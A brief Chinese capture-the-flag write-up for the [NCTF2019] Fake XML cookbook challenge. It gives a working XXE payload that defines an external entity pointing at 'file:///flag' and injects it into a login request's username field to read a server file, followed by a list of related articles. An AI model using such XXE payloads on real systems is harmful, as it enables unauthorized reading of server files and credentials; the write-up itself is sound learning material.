xml的题目放着好久了没做,做一下顺便学习。
浅谈XML实体注入漏洞
是个登录场景,登录抓包。
很明显的xml注入
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
拿到flag
相关文章
- 01-30xxe入门学习--------BUUCTF:[NCTF2019]Fake XML cookbook---------jarvisoj的API调用
- 01-30[NCTF2019]Fake XML cookbook
- 01-30[NCTF2019]Fake XML cookbook
- 01-30[NCTF2019]True XML cookbook Writeup
- 01-30《Python Cookbook(第3版)中文版》——6.5 将字典转换为XML
- 01-30web | [NCTF2019]Fake XML cookbook
- 01-30python cookbook第三版学习笔记七:python解析csv,json,xml文件
- 01-30OPA 22 - sinor fake xml http request
- 01-30《Python Cookbook(第3版)中文版》——6.3 解析简单的XML文档